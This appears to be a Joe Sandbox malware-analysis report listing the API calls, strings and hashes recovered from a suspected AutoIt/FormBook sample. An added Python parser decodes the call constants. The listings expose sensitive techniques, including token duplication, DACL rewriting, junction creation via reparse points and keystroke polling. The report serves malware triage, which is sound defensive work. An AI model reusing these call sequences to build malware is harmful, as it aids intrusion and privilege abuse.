                                                        • _memset.LIBCMT ref: 00818353
                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008183A5
                                                        • CloseHandle.KERNEL32(?), ref: 008183B6
                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008183CD
                                                        • GetProcessWindowStation.USER32 ref: 008183E6
                                                        • SetProcessWindowStation.USER32(00000000), ref: 008183F0
                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0081840A
                                                          • Part of subcall function 008181CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00818309), ref: 008181E0
                                                          • Part of subcall function 008181CB: CloseHandle.KERNEL32(?,?,00818309), ref: 008181F2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                        • String ID: $default$winsta0
                                                        • API String ID: 2063423040-1027155976
                                                        • Opcode ID: dd16d8f6d90d0c9639e72ba7ad17c64d17fe119f6ea1d4d90ad2add47210cdc1
                                                        • Instruction ID: 348a6704de5b7e52a3f723af729db087e8cd9a3c890c8da7fe5146d396499656
                                                        • Opcode Fuzzy Hash: dd16d8f6d90d0c9639e72ba7ad17c64d17fe119f6ea1d4d90ad2add47210cdc1
                                                        • Instruction Fuzzy Hash: 498168B1900249EFDF119FA4DC46AEEBBBDFF09304F144169F914E2261EB358A94DB20
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0082C78D
                                                        • FindClose.KERNEL32(00000000), ref: 0082C7E1
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0082C806
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0082C81D
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0082C844
                                                        • __swprintf.LIBCMT ref: 0082C890
                                                        • __swprintf.LIBCMT ref: 0082C8D3
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                        • __swprintf.LIBCMT ref: 0082C927
                                                          • Part of subcall function 007E3698: __woutput_l.LIBCMT ref: 007E36F1
                                                        • __swprintf.LIBCMT ref: 0082C975
                                                          • Part of subcall function 007E3698: __flsbuf.LIBCMT ref: 007E3713
                                                          • Part of subcall function 007E3698: __flsbuf.LIBCMT ref: 007E372B
                                                        • __swprintf.LIBCMT ref: 0082C9C4
                                                        • __swprintf.LIBCMT ref: 0082CA13
                                                        • __swprintf.LIBCMT ref: 0082CA62
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                        • API String ID: 3953360268-2428617273
                                                        • Opcode ID: cec648590f16f3f9eb09fd7f3bd341e4644f27f3609a6d9ac8e872117e130fce
                                                        • Instruction ID: 958cfbaddef8adf0c46e39e7286f9890794dfbc33a079515377b842f530e2495
                                                        • Opcode Fuzzy Hash: cec648590f16f3f9eb09fd7f3bd341e4644f27f3609a6d9ac8e872117e130fce
                                                        • Instruction Fuzzy Hash: 36A11CB1504344EBC744EBA4C889EAFB7ECFF98704F40492DF695C6151EA35EA48CB62
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0082EFB6
                                                        • _wcscmp.LIBCMT ref: 0082EFCB
                                                        • _wcscmp.LIBCMT ref: 0082EFE2
                                                        • GetFileAttributesW.KERNEL32(?), ref: 0082EFF4
                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 0082F00E
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0082F026
                                                        • FindClose.KERNEL32(00000000), ref: 0082F031
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0082F04D
                                                        • _wcscmp.LIBCMT ref: 0082F074
                                                        • _wcscmp.LIBCMT ref: 0082F08B
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0082F09D
                                                        • SetCurrentDirectoryW.KERNEL32(00878920), ref: 0082F0BB
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0082F0C5
                                                        • FindClose.KERNEL32(00000000), ref: 0082F0D2
                                                        • FindClose.KERNEL32(00000000), ref: 0082F0E4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                        • String ID: *.*
                                                        • API String ID: 1803514871-438819550
                                                        • Opcode ID: 811a7dc156c8f51f9e082630dc2cc6c5e7d6a9081fc69ed77e053cf13d048854
                                                        • Instruction ID: 485aa6a62942f3f702787cebec82e19adbef40c0da1e02f059657034b348a0ed
                                                        • Opcode Fuzzy Hash: 811a7dc156c8f51f9e082630dc2cc6c5e7d6a9081fc69ed77e053cf13d048854
                                                        • Instruction Fuzzy Hash: 0831C136501628ABDB149BB4EC48AEEB7ACFF49360F104179EA14D3192DB74DA80CE65
                                                        APIs
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00840953
                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0084F910,00000000,?,00000000,?,?), ref: 008409C1
                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00840A09
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00840A92
                                                        • RegCloseKey.ADVAPI32(?), ref: 00840DB2
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00840DBF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectCreateRegistryValue
                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                        • API String ID: 536824911-966354055
                                                        • Opcode ID: 1d87e0cc4a5c190d98053d2feda1d279695272d1837cfa51c3b7878fda7d56ca
                                                        • Instruction ID: 3406b6e2174b3509c2f153a96f549e1b6bc49d2d83971564f3d3c34a5365d9d2
                                                        • Opcode Fuzzy Hash: 1d87e0cc4a5c190d98053d2feda1d279695272d1837cfa51c3b7878fda7d56ca
                                                        • Instruction Fuzzy Hash: 82023475600615DFCB54EF24C889E2AB7E5FF89714F04895CFA8A9B262CB34EC41CB81
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0082F113
                                                        • _wcscmp.LIBCMT ref: 0082F128
                                                        • _wcscmp.LIBCMT ref: 0082F13F
                                                          • Part of subcall function 00824385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008243A0
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0082F16E
                                                        • FindClose.KERNEL32(00000000), ref: 0082F179
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0082F195
                                                        • _wcscmp.LIBCMT ref: 0082F1BC
                                                        • _wcscmp.LIBCMT ref: 0082F1D3
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0082F1E5
                                                        • SetCurrentDirectoryW.KERNEL32(00878920), ref: 0082F203
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0082F20D
                                                        • FindClose.KERNEL32(00000000), ref: 0082F21A
                                                        • FindClose.KERNEL32(00000000), ref: 0082F22C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                        • String ID: *.*
                                                        • API String ID: 1824444939-438819550
                                                        • Opcode ID: e8ecf25d936c28f6ceee8e4f3c43ab747bf34958a4a6f7d858f9663201b27449
                                                        • Instruction ID: 1f59394a6db277f24f91bae58b982a84f3d479496410f85f364715bcd007dd31
                                                        • Opcode Fuzzy Hash: e8ecf25d936c28f6ceee8e4f3c43ab747bf34958a4a6f7d858f9663201b27449
                                                        • Instruction Fuzzy Hash: 5131C436501229AADB109F74FC49AEE77BCFF4A360F100175FA14E2292DB34DA95CE54
                                                        APIs
                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0082A20F
                                                        • __swprintf.LIBCMT ref: 0082A231
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0082A26E
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0082A293
                                                        • _memset.LIBCMT ref: 0082A2B2
                                                        • _wcsncpy.LIBCMT ref: 0082A2EE
                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0082A323
                                                        • CloseHandle.KERNEL32(00000000), ref: 0082A32E
                                                        • RemoveDirectoryW.KERNEL32(?), ref: 0082A337
                                                        • CloseHandle.KERNEL32(00000000), ref: 0082A341
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                        • String ID: :$\$\??\%s
                                                        • API String ID: 2733774712-3457252023
                                                        • Opcode ID: ea0b121c345640ca185dace33a533a23ae31150fe4cc30b0bc64b3bd777bcc5b
                                                        • Instruction ID: d843482aae5118ca505a1a41ee2807edd0f53e52ca498012b79f484290fd34c2
                                                        • Opcode Fuzzy Hash: ea0b121c345640ca185dace33a533a23ae31150fe4cc30b0bc64b3bd777bcc5b
                                                        • Instruction Fuzzy Hash: 1B31AEB5900159ABDB21DFA0DC49FEB77BCFF89700F1040BAF608D2261EB7496848B65
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 3c}$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$dfew56dfew86dfew86dfewf6dfewe6dfewf6dfewf6dfewf6dfewf6dfew86dfew36dfew76dfewd6dfewd6dfewc6dfew06dfew06dfew76dfew46dfew46dfew06dfew$_}
                                                        • API String ID: 0-3723656305
                                                        • Opcode ID: 281fcb54710b5236ba1f426194c25e781772aa6b9526f785eb5214454f730e83
                                                        • Instruction ID: d8ac4fb9b9e455a59eb2444632ca2a3427112c94dfff3362427441860f695bfc
                                                        • Opcode Fuzzy Hash: 281fcb54710b5236ba1f426194c25e781772aa6b9526f785eb5214454f730e83
                                                        • Instruction Fuzzy Hash: 06727DB5E00219DADF14CF58C8847EEB7B5FF48710F24816AE949EB384EB349981CB90
                                                        APIs
                                                          • Part of subcall function 00818202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0081821E
                                                          • Part of subcall function 00818202: GetLastError.KERNEL32(?,00817CE2,?,?,?), ref: 00818228
                                                          • Part of subcall function 00818202: GetProcessHeap.KERNEL32(00000008,?,?,00817CE2,?,?,?), ref: 00818237
                                                          • Part of subcall function 00818202: HeapAlloc.KERNEL32(00000000,?,00817CE2,?,?,?), ref: 0081823E
                                                          • Part of subcall function 00818202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00818255
                                                          • Part of subcall function 0081829F: GetProcessHeap.KERNEL32(00000008,00817CF8,00000000,00000000,?,00817CF8,?), ref: 008182AB
                                                          • Part of subcall function 0081829F: HeapAlloc.KERNEL32(00000000,?,00817CF8,?), ref: 008182B2
                                                          • Part of subcall function 0081829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00817CF8,?), ref: 008182C3
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00817D13
                                                        • _memset.LIBCMT ref: 00817D28
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00817D47
                                                        • GetLengthSid.ADVAPI32(?), ref: 00817D58
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00817D95
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00817DB1
                                                        • GetLengthSid.ADVAPI32(?), ref: 00817DCE
                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00817DDD
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00817DE4
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00817E05
                                                        • CopySid.ADVAPI32(00000000), ref: 00817E0C
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00817E3D
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00817E63
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00817E77
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                        • String ID:
                                                        • API String ID: 3996160137-0
                                                        • Opcode ID: db36f7dbc2ed7ca18de0cbcec13cbea464773893d23c9e820e5b27d66f8432a5
                                                        • Instruction ID: b6e642e5db10704db2baaa66d6e522160d0bbbb6f786f170572e79b77267726f
                                                        • Opcode Fuzzy Hash: db36f7dbc2ed7ca18de0cbcec13cbea464773893d23c9e820e5b27d66f8432a5
                                                        • Instruction Fuzzy Hash: ED617875900609EFDF01CFA4DC85AEEBBB9FF04700F14826DE915E62A2DB319A41CB60
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00820097
                                                        • SetKeyboardState.USER32(?), ref: 00820102
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00820122
                                                        • GetKeyState.USER32(000000A0), ref: 00820139
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00820168
                                                        • GetKeyState.USER32(000000A1), ref: 00820179
                                                        • GetAsyncKeyState.USER32(00000011), ref: 008201A5
                                                        • GetKeyState.USER32(00000011), ref: 008201B3
                                                        • GetAsyncKeyState.USER32(00000012), ref: 008201DC
                                                        • GetKeyState.USER32(00000012), ref: 008201EA
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00820213
                                                        • GetKeyState.USER32(0000005B), ref: 00820221
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: f97e8c4c74fb3519ee3e618fcb9ef3c7eb1ca5c2e6e4808b2bcf33659ccf4f9c
                                                        • Instruction ID: d13fdc6cbb79649701d886c84bfb729940b79e6c8da7a393acc7271e373fe3cb
                                                        • Opcode Fuzzy Hash: f97e8c4c74fb3519ee3e618fcb9ef3c7eb1ca5c2e6e4808b2bcf33659ccf4f9c
                                                        • Instruction Fuzzy Hash: 8A51FD209047A829FB35D764A8547EABFB4FF11380F08459E85C1DA1C3DA649BCCCF62
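Two of the listings above are worth reading as sequences rather than as loose API names. The function whose calls sit at 0082A20F through 0082A341 (GetFullPathNameW, CreateDirectoryW, CreateFileW with flags 02200000, DeviceIoControl with control code 000900A4, and the `\??\%s` format string) is the standard way to turn a freshly created directory into an NTFS junction or mount point: FILE_FLAG_BACKUP_SEMANTICS|FILE_FLAG_OPEN_REPARSE_POINT opens the directory itself, and FSCTL_SET_REPARSE_POINT writes the target, which must be given as an NT-namespace path of the `\??\` form. The function at 00820097 through 00820221 polls GetAsyncKeyState/GetKeyState for virtual-key codes A0, A1, 11, 12 and 5B, which are left Shift, right Shift, Ctrl, Alt and the left Windows key. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it parses listing lines in exactly the format shown on this page, decodes those constants from the Windows SDK values, and checks the two sequences mechanically. The two embedded listings are copied from the functions just named (the key-state one is excerpted); the function and table names are my own.

```python
"""Parse Joe Sandbox per-function API listings and decode the Win32 constants
that matter for triage. Added example; not part of the report or of the sample."""
import re
from dataclasses import dataclass
from typing import List, Optional, Union

Arg = Union[int, str, None]
# Listing line shapes: "• Func.MODULE(args), ref: ADDR", "• _crt.LIBCMT ref: ADDR",
# and "• Part of subcall function ADDR: Func.MODULE(args), ref: ADDR".
_LINE = re.compile(r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?(?P<func>\w+)"
                   r"\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
# Constant tables, values as defined in the Windows SDK headers.
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN", 0x5C: "VK_RWIN",
            0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL", 0xA3: "VK_RCONTROL",
            0xA4: "VK_LMENU", 0xA5: "VK_RMENU"}
FSCTL_NAMES = {0x000900A4: "FSCTL_SET_REPARSE_POINT", 0x000900A8: "FSCTL_GET_REPARSE_POINT",
               0x000900AC: "FSCTL_DELETE_REPARSE_POINT"}
CREATEFILE_FLAGS = [(0x80000000, "FILE_FLAG_WRITE_THROUGH"), (0x40000000, "FILE_FLAG_OVERLAPPED"),
                    (0x04000000, "FILE_FLAG_DELETE_ON_CLOSE"), (0x02000000, "FILE_FLAG_BACKUP_SEMANTICS"),
                    (0x00200000, "FILE_FLAG_OPEN_REPARSE_POINT"), (0x00000080, "FILE_ATTRIBUTE_NORMAL")]

@dataclass
class ApiCall:
    func: str
    module: str
    args: List[Arg]
    ref: int                          # address of the call site
    subcall_of: Optional[int] = None  # set when the call is inside a callee

def parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None                   # value not recovered by the sandbox
    if re.fullmatch(r"-?[0-9A-F]{8}", tok):
        return int(tok, 16)           # numbers are printed as 8 hex digits
    return tok                        # a string literal such as *.*

def parse_listing(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue                  # headers, hashes, dump-source lines
        args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["func"], m["module"], args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls

def annotate(c: ApiCall) -> Optional[str]:
    """Decode the one argument that tells an analyst what the call is for."""
    a = c.args
    if c.func in ("GetAsyncKeyState", "GetKeyState") and a and isinstance(a[0], int):
        return VK_NAMES.get(a[0], f"vk=0x{a[0]:02X}")
    if c.func == "DeviceIoControl" and len(a) > 1 and isinstance(a[1], int):
        return FSCTL_NAMES.get(a[1], f"ioctl=0x{a[1]:08X}")
    if c.func == "CreateFileW" and len(a) > 5 and isinstance(a[5], int):
        return "|".join(n for bit, n in CREATEFILE_FLAGS if a[5] & bit) or f"flags=0x{a[5]:08X}"
    return None

def reparse_point_sequence(calls: List[ApiCall]) -> bool:
    """CreateDirectoryW, CreateFileW(FILE_FLAG_OPEN_REPARSE_POINT), DeviceIoControl(
    FSCTL_SET_REPARSE_POINT): the sequence that turns a new directory into a junction."""
    want = ["CreateDirectoryW", "CreateFileW", "DeviceIoControl"]
    for c in calls:
        note = annotate(c) or ""
        ok = (c.func == want[0] and c.subcall_of is None          # this function's own calls
              and (c.func != "CreateFileW" or "FILE_FLAG_OPEN_REPARSE_POINT" in note)
              and (c.func != "DeviceIoControl" or note == "FSCTL_SET_REPARSE_POINT"))
        if ok:
            want.pop(0)
        if not want:
            return True
    return False

def polled_keys(calls: List[ApiCall]) -> List[str]:
    """Virtual-key codes polled through GetAsyncKeyState/GetKeyState, decoded."""
    return sorted({annotate(c) for c in calls
                   if c.func in ("GetAsyncKeyState", "GetKeyState") and annotate(c)})

# Copied from the report's listing for the function at 0082A20F..0082A341.
REPARSE_LISTING = """\
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0082A20F
• __swprintf.LIBCMT ref: 0082A231
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0082A26E
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0082A293
• _memset.LIBCMT ref: 0082A2B2
• _wcsncpy.LIBCMT ref: 0082A2EE
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0082A323
• CloseHandle.KERNEL32(00000000), ref: 0082A32E
• RemoveDirectoryW.KERNEL32(?), ref: 0082A337
• CloseHandle.KERNEL32(00000000), ref: 0082A341
"""
# Excerpt of the listing for the function at 00820097..00820221.
KEYSTATE_LISTING = """\
• GetKeyboardState.USER32(?), ref: 00820097
• GetAsyncKeyState.USER32(000000A0), ref: 00820122
• GetKeyState.USER32(000000A0), ref: 00820139
• GetAsyncKeyState.USER32(000000A1), ref: 00820168
• GetAsyncKeyState.USER32(00000011), ref: 008201A5
• GetAsyncKeyState.USER32(00000012), ref: 008201DC
• GetAsyncKeyState.USER32(0000005B), ref: 00820213
"""
```

Paste any other function's API list from this report into `parse_listing` to get the same decoding; lines that are not API calls (hashes, dump sources, headings) are skipped. One caveat before treating either sequence as a FormBook indicator: the report identifies the binary as a compiled AutoIt script, and both routines look like ordinary AutoIt runtime code (junction creation and modifier-key handling for synthesized input), so their presence says little on its own. The decoded constants are useful for the opposite reason: they let you separate interpreter boilerplate from the injected payload's behaviour when you read the listings of the other processes in the report.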
                                                        APIs
                                                          • Part of subcall function 00840E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0083FDAD,?,?), ref: 00840E31
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008404AC
                                                          • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
                                                          • Part of subcall function 007C9837: __swprintf.LIBCMT ref: 007C98AC
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0084054B
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008405E3
                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00840822
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0084082F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1240663315-0
                                                        • Opcode ID: 7c22e074384b164dd1d55e91121aec917590226d504b20076c2a1a2d2c54016c
                                                        • Instruction ID: 8fa27275f12f896a1a0c25316ec684bbf83e27af31d18483dac65d61d1e50ade
                                                        • Opcode Fuzzy Hash: 7c22e074384b164dd1d55e91121aec917590226d504b20076c2a1a2d2c54016c
                                                        • Instruction Fuzzy Hash: EFE14C31604204EFCB14DF28C895E6BBBE5FF89714B04856DF94ADB262DA35E901CF92
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                        • String ID:
                                                        • API String ID: 1737998785-0
                                                        • Opcode ID: 6c893bdd30b25a444089f19d0932fea5c6b04b7944c83c6317edaf8528319754
                                                        • Instruction ID: 0c6a7e2d54eeaaf0791bcdcd1342daeabf6e48669d7d5cf3f3d87e4ff09c0b57
                                                        • Opcode Fuzzy Hash: 6c893bdd30b25a444089f19d0932fea5c6b04b7944c83c6317edaf8528319754
